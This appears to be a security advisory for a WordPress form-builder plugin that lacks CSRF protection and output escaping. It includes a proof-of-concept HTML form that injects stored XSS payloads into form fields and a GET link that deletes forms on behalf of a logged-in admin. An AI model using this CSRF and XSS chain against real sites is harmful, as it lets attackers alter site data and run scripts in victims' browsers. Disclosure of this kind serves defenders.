The plugin does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.
Edit a form and put XSS payloads:
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST">
<input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' />
<input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' />
<input type="hidden" name="formbuilder[recipient]" value='[email protected] New Form"><script>alert(/XSS3/)</script>' />
<input type="hidden" name="formbuilder[method]" value="POST" />
<input type="hidden" name="formbuilder[action]" value="" />
<input type="hidden" name="formbuilder[thankyoutext]" value="" />
<input type="hidden" name="formbuilder[autoresponse]" value="" />
<input type="hidden" name="formbuilder[tags]" value="" />
<input type="hidden" name="Save" value="Save Form" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2